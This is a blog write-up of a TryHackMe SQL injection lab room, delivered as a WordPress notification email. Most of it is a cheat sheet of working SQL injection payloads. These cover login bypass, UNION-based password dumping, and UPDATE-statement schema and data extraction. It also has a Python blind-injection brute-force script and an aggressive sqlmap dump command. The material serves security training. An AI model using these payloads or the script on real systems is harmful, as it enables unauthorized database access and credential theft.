[New post] THM – SQL Injection Lab

marcorei7 posted: " Description: Understand how SQL injection attacks work and how to exploit this vulnerability. Tags: security, sqli, sqlmap, web Difficulty: Easy Host: TryHackMe | SQL Injection Lab (by Fafa and eXistens) - https://tryhackme.com/room/sqlilab " Respond to this post by replying above this line New post on MarCorei7 THM – SQL Injection Lab by marcorei7 Description: Understand how SQL injection attacks work and how to exploit this vulnerability. Tags: security, sqli, sqlmap, web Difficulty: Easy Host: TryHackMe | SQL Injection Lab (by Fafa and eXistens) - https://tryhackme.com/room/sqlilab This is just a quick walkthrough and basically just a collection of the payloads as a nice cheat sheet. 1. Introduction 2. Introduction to SQL Injection: Part 1 2.1 What is the flag for SQL Injection 1: Input Box Non-String? 1 OR 1=1 -- - 2.2 What is the flag for SQL Injection 2: Input Box String? 1' OR '1'='1'-- - 2.3 What is the flag for SQL Injection 3: URL Injection? Basic payload: [...]/login?profileID=-1' or 1=1-- -&password=a Encoded payload: [...]/login?profileID=-1%27%20or%201=1--%20-&password=a 2.4 What is the flag for SQL Injection 4: POST Injection? 3. Introduction to SQL Injection: Part 2 3.1 What is the flag for SQL Injection 5: UPDATE Statement? First login with 10:toor, went to "Edit Profile" and tested the vulnerability by entering the following data into the "nickName" field. asd',nickName='test',email='hacked But only "nickName" gets updated. Then I entered it to "email" and it worked. I got the version number 3.22.0 with SQLite asd',nickName=sqlite_version(),email='hacked To dump the table names ',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email=' usertable and secrets. To dump column names of it ',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email=' Output was CREATE TABLE secrets ( id integer primary key, author integer not null, secret text not null ) Then extracted the data with ',nickName=(SELECT group_concat(id || "," || author || "," || secret || ":") from secrets),email=' Alternatively it's possible with: ',nickName=(SELECT group_concat(secret) from secrets),email=' 4. Vulnerable Startup: Broken Authentication 4.1 What is the flag for this challenge? ' OR 1=1-- - 5. Vulnerable Startup: Broken Authentication 2 5.1 What is the flag for this challenge? I logged in as before with ' OR 1=1-- - Then login finding out the columns ' UNION SELECT 1,2-- - Extracting the passwords from the users table ' UNION SELECT 1,group_concat(password) FROM users-- - 6. Vulnerable Startup: Broken Authentication 3 (Blind Injection) 6.1 What is the flag for this challenge? Getting the length of the password with admin' AND length((SELECT password from users where username='admin'))==37-- - Script for blind SQLi. #!/usr/bin/python3 import sys import requests import string def send_p(url, query): payload = {"username": query, "password": "admin"} try: r = requests.post(url, data=payload, timeout=3) except requests.exceptions.ConnectTimeout: print("[!] ConnectionTimeout: Try to adjust the timeout time") sys.exit(1) return r.text def main(addr): url = f"http://{addr}/challenge3/login" flag = "" password_len = 38 # Not the most efficient way of doing it... for i in range(1, password_len): for c in string.ascii_lowercase + string.ascii_uppercase + string.digits + "{}": # Convert char to hex and remove "0x" h = hex(ord(c))[2:] query = "admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1)," \ f"{i},1)=CAST(X'{h}' AS TEXT)--" resp = send_p(url, query) if not "Invalid" in resp: flag += c print(flag) print(f"[+] FLAG: {flag}") if __name__ == "__main__": if len(sys.argv) == 1: print(f"Usage: {sys.argv[0]} MACHINE_IP:PORT") sys.exit(0) main(sys.argv[1]) Alternative: sqlmap -u http://'machine-ip':5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b --dump 7. Vulnerable Startup: Vulnerable Notes 7.1 What is the flag for this challenge? Register with ' UNION SELECT 1,2' and login. With this, the next exploit is visible. Get tables from database with ' UNION SELECT 1,group_concat(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%'' Tables are users and notes. And to catch the flag ' UNION SELECT 1,group_concat(password) FROM users' 8. Vulnerable Startup: Change Password 8.1 What is the flag for this challenge? Registered and logged in with admin'-- - Changed the password and the password got changed for the "admin" user. Logged out and back in with "admin". 9. Vulnerable Startup: Book Title 9.1 What is the flag for this challenge? Register/login and link click. Title ') OR 1=1-- - I got an output with four columns and the UNION SELECT statement ') UNION SELECT NULL,NULL,NULL,NULL-- - So I replaced every NULL value with numbers ') UNION SELECT 1,2,3,4-- - Just to be sure I checked the version and the backend with ') UNION SELECT 1,sqlite_version(),3,4-- - and got "3.22.0" as the version number as an output. To get the flag I entered ') UNION SELECT 1,group_concat(password),3,4 FROM users-- - 10. Vulnerable Startup: Book Title 2 10.1 What is the flag for this challenge? Registered and logged in. ' UNION SELECT 'STRING Got no output as intended. The payload ' UNION SELECT '1'-- - dumped the first entry. To get the working statement I used the payload from the task ' UNION SELECT '-1''UNION SELECT 1,2,3,4-- - and edited it to get the flag. ' UNION SELECT '-1''UNION SELECT 1,group_concat(password),3,4 FROM users-- - 11. Thank you! No. Thank you for creating this awesome room! This free site is ad-supported. Learn more ​ marcorei7 | July 18, 2021 at 10:50 am | Tags: SQLi, sqlmap, tryhackme, writeup | Categories: tryhackme | URL: https://wp.me/pcewSA-2ZU Comment    See all comments    Like Unsubscribe to no longer receive posts from MarCorei7. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: https://marcorei7.wordpress.com/2021/07/18/165-sql-injection-lab/ Thanks for flying with WordPress.com